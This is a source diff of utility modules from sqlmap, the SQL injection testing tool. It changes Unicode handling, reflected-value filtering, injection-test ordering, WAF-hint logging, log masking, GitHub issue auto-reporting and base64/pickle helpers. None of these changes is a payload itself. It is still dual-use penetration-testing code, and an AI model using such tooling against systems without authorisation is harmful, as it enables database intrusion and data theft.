return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
||||||
except UnicodeDecodeError, ex:
|
except UnicodeDecodeError, ex:
|
||||||
|
try:
|
||||||
|
return unicode(value, UNICODE_ENCODING)
|
||||||
|
except:
|
||||||
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
return unicode(value)
|
return unicode(value)
|
||||||
except UnicodeDecodeError:
|
except UnicodeDecodeError:
|
||||||
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
||||||
else:
|
|
||||||
try:
|
|
||||||
return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
|
|
||||||
except:
|
|
||||||
return getUnicode(value, UNICODE_ENCODING)
|
|
||||||
|
|
||||||
def longestCommonPrefix(*sequences):
|
def longestCommonPrefix(*sequences):
|
||||||
"""
|
"""
|
||||||
|
@ -2179,7 +2281,7 @@ def findMultipartPostBoundary(post):
|
||||||
candidates = []
|
candidates = []
|
||||||
|
|
||||||
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
|
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
|
||||||
_ = match.group(1)
|
_ = match.group(1).strip().strip('-')
|
||||||
if _ in done:
|
if _ in done:
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
|
@ -2380,7 +2482,11 @@ def extractTextTagContent(page):
|
||||||
[u'Title', u'foobar']
|
[u'Title', u'foobar']
|
||||||
"""
|
"""
|
||||||
|
|
||||||
page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
|
page = page or ""
|
||||||
|
|
||||||
|
if REFLECTED_VALUE_MARKER in page:
|
||||||
|
page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
|
||||||
|
|
||||||
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
|
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
|
||||||
|
|
||||||
def trimAlphaNum(value):
|
def trimAlphaNum(value):
|
||||||
|
@ -2440,6 +2546,9 @@ def findDynamicContent(firstPage, secondPage):
|
||||||
are dynamic, proper markings will be made
|
are dynamic, proper markings will be made
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if not firstPage or not secondPage:
|
||||||
|
return
|
||||||
|
|
||||||
infoMsg = "searching for dynamic content"
|
infoMsg = "searching for dynamic content"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -2490,11 +2599,11 @@ def removeDynamicContent(page):
|
||||||
if prefix is None and suffix is None:
|
if prefix is None and suffix is None:
|
||||||
continue
|
continue
|
||||||
elif prefix is None:
|
elif prefix is None:
|
||||||
page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
|
page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
|
||||||
elif suffix is None:
|
elif suffix is None:
|
||||||
page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
|
page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
|
||||||
else:
|
else:
|
||||||
page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
|
||||||
|
|
||||||
return page
|
return page
|
||||||
|
|
||||||
|
@ -2568,7 +2677,7 @@ def parseSqliteTableSchema(value):
|
||||||
table = {}
|
table = {}
|
||||||
columns = {}
|
columns = {}
|
||||||
|
|
||||||
for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
|
for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
|
||||||
columns[match.group(1)] = match.group(2)
|
columns[match.group(1)] = match.group(2)
|
||||||
|
|
||||||
table[conf.tbl] = columns
|
table[conf.tbl] = columns
|
||||||
|
@ -2733,14 +2842,14 @@ def getSortedInjectionTests():
|
||||||
retVal = SORT_ORDER.LAST
|
retVal = SORT_ORDER.LAST
|
||||||
|
|
||||||
elif 'details' in test and 'dbms' in test.details:
|
elif 'details' in test and 'dbms' in test.details:
|
||||||
if test.details.dbms in Backend.getErrorParsedDBMSes():
|
if intersect(test.details.dbms, Backend.getIdentifiedDbms()):
|
||||||
retVal = SORT_ORDER.SECOND
|
retVal = SORT_ORDER.SECOND
|
||||||
else:
|
else:
|
||||||
retVal = SORT_ORDER.THIRD
|
retVal = SORT_ORDER.THIRD
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
if Backend.getErrorParsedDBMSes():
|
if Backend.getIdentifiedDbms():
|
||||||
retVal = sorted(retVal, key=priorityFunction)
|
retVal = sorted(retVal, key=priorityFunction)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -2772,20 +2881,24 @@ def showHttpErrorCodes():
|
||||||
if code in httplib.responses else '?', count) \
|
if code in httplib.responses else '?', count) \
|
||||||
for code, count in kb.httpErrorCodes.items())
|
for code, count in kb.httpErrorCodes.items())
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
|
||||||
|
msg = "too many 4xx and/or 5xx HTTP error codes "
|
||||||
|
msg += "could mean that some kind of protection is involved (e.g. WAF)"
|
||||||
|
logger.debug(msg)
|
||||||
|
|
||||||
def openFile(filename, mode='r'):
|
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
|
||||||
"""
|
"""
|
||||||
Returns file handle of a given filename
|
Returns file handle of a given filename
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
|
return codecs.open(filename, mode, encoding, errors, buffering)
|
||||||
except IOError:
|
except IOError:
|
||||||
errMsg = "there has been a file opening error for filename '%s'. " % filename
|
errMsg = "there has been a file opening error for filename '%s'. " % filename
|
||||||
errMsg += "Please check %s permissions on a file " % ("write" if \
|
errMsg += "Please check %s permissions on a file " % ("write" if \
|
||||||
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
|
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
|
||||||
errMsg += "and that it's not locked by another process."
|
errMsg += "and that it's not locked by another process."
|
||||||
raise SqlmapFilePathException(errMsg)
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def decodeIntToUnicode(value):
|
def decodeIntToUnicode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -2800,14 +2913,11 @@ def decodeIntToUnicode(value):
|
||||||
|
|
||||||
if isinstance(value, int):
|
if isinstance(value, int):
|
||||||
try:
|
try:
|
||||||
# http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
|
if value > 255:
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
|
||||||
_ = "%x" % value
|
_ = "%x" % value
|
||||||
if len(_) % 2 == 1:
|
if len(_) % 2 == 1:
|
||||||
_ = "0%s" % _
|
_ = "0%s" % _
|
||||||
retVal = getUnicode(hexdecode(_))
|
retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
|
||||||
elif value > 255:
|
|
||||||
retVal = unichr(value)
|
|
||||||
else:
|
else:
|
||||||
retVal = getUnicode(chr(value))
|
retVal = getUnicode(chr(value))
|
||||||
except:
|
except:
|
||||||
|
@ -2820,35 +2930,107 @@ def unhandledExceptionMessage():
|
||||||
Returns detailed message about occurred unhandled exception
|
Returns detailed message about occurred unhandled exception
|
||||||
"""
|
"""
|
||||||
|
|
||||||
errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
|
errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
|
||||||
errMsg += "run with the latest development version from the GitHub "
|
errMsg += "run with the latest development version from official GitHub "
|
||||||
errMsg += "repository. If the exception persists, please send by e-mail "
|
errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
|
||||||
errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
|
errMsg += "at '%s' " % ISSUES_PAGE
|
||||||
errMsg += "and any information required to reproduce the bug. The "
|
errMsg += "with the following text and any other information required to "
|
||||||
|
errMsg += "reproduce the bug. The "
|
||||||
errMsg += "developers will try to reproduce the bug, fix it accordingly "
|
errMsg += "developers will try to reproduce the bug, fix it accordingly "
|
||||||
errMsg += "and get back to you.\n"
|
errMsg += "and get back to you\n"
|
||||||
errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
|
errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
|
||||||
errMsg += "Python version: %s\n" % PYVERSION
|
errMsg += "Python version: %s\n" % PYVERSION
|
||||||
errMsg += "Operating system: %s\n" % PLATFORM
|
errMsg += "Operating system: %s\n" % PLATFORM
|
||||||
errMsg += "Command line: %s\n" % " ".join(sys.argv)
|
errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
|
||||||
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
|
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
|
||||||
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
|
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
|
||||||
|
|
||||||
return maskSensitiveData(errMsg)
|
return errMsg
|
||||||
|
|
||||||
|
def createGithubIssue(errMsg, excMsg):
|
||||||
|
"""
|
||||||
|
Automatically create a Github issue with unhandled exception information
|
||||||
|
"""
|
||||||
|
|
||||||
|
issues = []
|
||||||
|
try:
|
||||||
|
issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
finally:
|
||||||
|
issues = set(issues)
|
||||||
|
|
||||||
|
_ = re.sub(r"'[^']+'", "''", excMsg)
|
||||||
|
_ = re.sub(r"\s+line \d+", "", _)
|
||||||
|
_ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
|
||||||
|
_ = re.sub(r".+\Z", "", _)
|
||||||
|
key = hashlib.md5(_).hexdigest()[:8]
|
||||||
|
|
||||||
|
if key in issues:
|
||||||
|
return
|
||||||
|
|
||||||
|
msg = "\ndo you want to automatically create a new (anonymized) issue "
|
||||||
|
msg += "with the unhandled exception information at "
|
||||||
|
msg += "the official Github repository? [y/N] "
|
||||||
|
try:
|
||||||
|
test = readInput(msg, default="N")
|
||||||
|
except:
|
||||||
|
test = None
|
||||||
|
|
||||||
|
if test and test[0] in ("y", "Y"):
|
||||||
|
ex = None
|
||||||
|
errMsg = errMsg[errMsg.find("\n"):]
|
||||||
|
|
||||||
|
|
||||||
|
data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
|
||||||
|
req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")})
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = urllib2.urlopen(req)
|
||||||
|
content = f.read()
|
||||||
|
except Exception, ex:
|
||||||
|
content = None
|
||||||
|
|
||||||
|
issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
|
||||||
|
if issueUrl:
|
||||||
|
infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(paths.GITHUB_HISTORY, "a+b") as f:
|
||||||
|
f.write("%s\n" % key)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
warnMsg = "something went wrong while creating a Github issue"
|
||||||
|
if ex:
|
||||||
|
warnMsg += " ('%s')" % ex
|
||||||
|
if "Unauthorized" in warnMsg:
|
||||||
|
warnMsg += ". Please update to the latest revision"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
def maskSensitiveData(msg):
|
def maskSensitiveData(msg):
|
||||||
"""
|
"""
|
||||||
Masks sensitive data in the supplied message
|
Masks sensitive data in the supplied message
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = msg
|
retVal = getUnicode(msg)
|
||||||
|
|
||||||
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
|
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
|
||||||
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item)
|
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
|
||||||
while extractRegexResult(regex, retVal):
|
while extractRegexResult(regex, retVal):
|
||||||
value = extractRegexResult(regex, retVal)
|
value = extractRegexResult(regex, retVal)
|
||||||
retVal = retVal.replace(value, '*' * len(value))
|
retVal = retVal.replace(value, '*' * len(value))
|
||||||
|
|
||||||
|
if not conf.get("hostname"):
|
||||||
|
match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal)
|
||||||
|
if match:
|
||||||
|
retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
|
||||||
|
|
||||||
|
|
||||||
|
if getpass.getuser():
|
||||||
|
retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def listToStrValue(value):
|
def listToStrValue(value):
|
||||||
|
@ -2923,7 +3105,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||||
|
|
||||||
retVal = content
|
retVal = content
|
||||||
|
|
||||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
|
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||||
def _(value):
|
def _(value):
|
||||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||||
|
@ -2958,7 +3140,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||||
|
|
||||||
if retVal != content and not kb.heuristicMode:
|
if retVal != content:
|
||||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||||
if not suppressWarning:
|
if not suppressWarning:
|
||||||
warnMsg = "reflective value(s) found and filtering out"
|
warnMsg = "reflective value(s) found and filtering out"
|
||||||
|
@ -3108,7 +3290,7 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
pointer = pointer.next[char]
|
pointer = pointer.next[char]
|
||||||
pointer.current.append(option)
|
pointer.current.append(option)
|
||||||
|
|
||||||
for mnemonic in mnemonics.split(','):
|
for mnemonic in (mnemonics or "").split(','):
|
||||||
found = None
|
found = None
|
||||||
name = mnemonic.split('=')[0].replace("-", "").strip()
|
name = mnemonic.split('=')[0].replace("-", "").strip()
|
||||||
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
|
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
|
||||||
|
@ -3134,7 +3316,10 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
if opt.startswith(name):
|
if opt.startswith(name):
|
||||||
options[opt] = option
|
options[opt] = option
|
||||||
|
|
||||||
if name in options:
|
if not options:
|
||||||
|
warnMsg = "mnemonic '%s' can't be resolved" % name
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
elif name in options:
|
||||||
found = name
|
found = name
|
||||||
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
|
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -3144,6 +3329,7 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
warnMsg += "Resolved to shortest of those ('%s')" % found
|
warnMsg += "Resolved to shortest of those ('%s')" % found
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if found:
|
||||||
found = options[found]
|
found = options[found]
|
||||||
else:
|
else:
|
||||||
found = pointer.current[0]
|
found = pointer.current[0]
|
||||||
|
@ -3212,6 +3398,8 @@ def randomizeParameterValue(value):
|
||||||
|
|
||||||
retVal = value
|
retVal = value
|
||||||
|
|
||||||
|
value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
|
||||||
|
|
||||||
for match in re.finditer('[A-Z]+', value):
|
for match in re.finditer('[A-Z]+', value):
|
||||||
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
|
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
|
||||||
|
|
||||||
|
@ -3251,7 +3439,10 @@ def asciifyUrl(url, forceQuote=False):
|
||||||
return url
|
return url
|
||||||
|
|
||||||
# idna-encode domain
|
# idna-encode domain
|
||||||
|
try:
|
||||||
hostname = parts.hostname.encode("idna")
|
hostname = parts.hostname.encode("idna")
|
||||||
|
except LookupError:
|
||||||
|
hostname = parts.hostname.encode(UNICODE_ENCODING)
|
||||||
|
|
||||||
# UTF8-quote the other parts. We check each part individually if
|
# UTF8-quote the other parts. We check each part individually if
|
||||||
# if needs to be quoted - that should catch some additional user
|
# if needs to be quoted - that should catch some additional user
|
||||||
|
@ -3340,10 +3531,10 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
except UnicodeError:
|
except UnicodeError:
|
||||||
pass
|
pass
|
||||||
except ParseError:
|
except ParseError:
|
||||||
|
if "<html" in (content or ""):
|
||||||
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
|
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
|
||||||
logger.warning(warnMsg)
|
logger.warning(warnMsg)
|
||||||
response.seek(0)
|
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, content)), url)
|
||||||
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
|
|
||||||
try:
|
try:
|
||||||
forms = ParseResponse(filtered, backwards_compat=False)
|
forms = ParseResponse(filtered, backwards_compat=False)
|
||||||
except ParseError:
|
except ParseError:
|
||||||
|
@ -3384,7 +3575,16 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
target = (url, method, data, conf.cookie)
|
# flag to know if we are dealing with the same target host
|
||||||
|
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
||||||
|
|
||||||
|
if conf.scope:
|
||||||
|
if not re.search(conf.scope, url, re.I):
|
||||||
|
continue
|
||||||
|
elif not _:
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
target = (url, method, data, conf.cookie, None)
|
||||||
retVal.add(target)
|
retVal.add(target)
|
||||||
else:
|
else:
|
||||||
errMsg = "there were no forms found at the given target URL"
|
errMsg = "there were no forms found at the given target URL"
|
||||||
|
@ -3395,17 +3595,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
|
|
||||||
if addToTargets and retVal:
|
if addToTargets and retVal:
|
||||||
for target in retVal:
|
for target in retVal:
|
||||||
url = target[0]
|
|
||||||
|
|
||||||
# flag to know if we are dealing with the same target host
|
|
||||||
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
|
||||||
|
|
||||||
if conf.scope:
|
|
||||||
if not re.search(conf.scope, url, re.I):
|
|
||||||
continue
|
|
||||||
elif not _:
|
|
||||||
continue
|
|
||||||
|
|
||||||
kb.targets.add(target)
|
kb.targets.add(target)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -3473,7 +3662,7 @@ def evaluateCode(code, variables=None):
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
raise
|
raise
|
||||||
except Exception, ex:
|
except Exception, ex:
|
||||||
errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
|
errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
def serializeObject(object_):
|
def serializeObject(object_):
|
||||||
|
@ -3529,7 +3718,7 @@ def applyFunctionRecursively(value, function):
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def decodeHexValue(value):
|
def decodeHexValue(value, raw=False):
|
||||||
"""
|
"""
|
||||||
Returns value decoded from DBMS specific hexadecimal representation
|
Returns value decoded from DBMS specific hexadecimal representation
|
||||||
|
|
||||||
|
@ -3544,7 +3733,7 @@ def decodeHexValue(value):
|
||||||
if value and isinstance(value, basestring) and len(value) % 2 == 0:
|
if value and isinstance(value, basestring) and len(value) % 2 == 0:
|
||||||
retVal = hexdecode(retVal)
|
retVal = hexdecode(retVal)
|
||||||
|
|
||||||
if not kb.binaryField:
|
if not kb.binaryField and not raw:
|
||||||
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
|
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
|
||||||
try:
|
try:
|
||||||
retVal = retVal.decode("utf-16-le")
|
retVal = retVal.decode("utf-16-le")
|
||||||
|
|
|
@ -1,10 +1,11 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import base64
|
||||||
import json
|
import json
|
||||||
import pickle
|
import pickle
|
||||||
import sys
|
import sys
|
||||||
|
@ -20,7 +21,7 @@ def base64decode(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.decode("base64")
|
return base64.b64decode(value)
|
||||||
|
|
||||||
def base64encode(value):
|
def base64encode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -30,7 +31,7 @@ def base64encode(value):
|
||||||
'Zm9vYmFy'
|
'Zm9vYmFy'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.encode("base64")[:-1].replace("\n", "")
|
return base64.b64encode(value)
|
||||||
|
|
||||||
def base64pickle(value):
|
def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
@ -41,6 +42,7 @@ def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
||||||
except:
|
except:
|
||||||
|
@ -63,7 +65,14 @@ def base64unpickle(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return pickle.loads(base64decode(value))
|
retVal = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = pickle.loads(base64decode(value))
|
||||||
|
except TypeError:
|
||||||
|
retVal = pickle.loads(base64decode(bytes(value)))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def hexdecode(value):
|
def hexdecode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -137,17 +146,21 @@ def htmlunescape(value):
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def singleTimeWarnMessage(message): # Cross-linked function
|
def singleTimeWarnMessage(message): # Cross-linked function
|
||||||
raise NotImplementedError
|
sys.stdout.write(message)
|
||||||
|
sys.stdout.write("\n")
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
def stdoutencode(data):
|
def stdoutencode(data):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
data = data or ""
|
||||||
|
|
||||||
# Reference: http://bugs.python.org/issue1602
|
# Reference: http://bugs.python.org/issue1602
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
output = data.encode("ascii", "replace")
|
output = data.encode(sys.stdout.encoding, "replace")
|
||||||
|
|
||||||
if output != data:
|
if '?' in output and '?' not in data:
|
||||||
warnMsg = "cannot properly display Unicode characters "
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
warnMsg += "inside Windows OS command prompt "
|
warnMsg += "inside Windows OS command prompt "
|
||||||
warnMsg += "(http://bugs.python.org/issue1602). All "
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -75,7 +75,7 @@ class AttribDict(dict):
|
||||||
for attr in dir(self):
|
for attr in dir(self):
|
||||||
if not attr.startswith('_'):
|
if not attr.startswith('_'):
|
||||||
value = getattr(self, attr)
|
value = getattr(self, attr)
|
||||||
if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
||||||
setattr(retVal, attr, copy.deepcopy(value, memo))
|
setattr(retVal, attr, copy.deepcopy(value, memo))
|
||||||
|
|
||||||
for key, value in self.items():
|
for key, value in self.items():
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
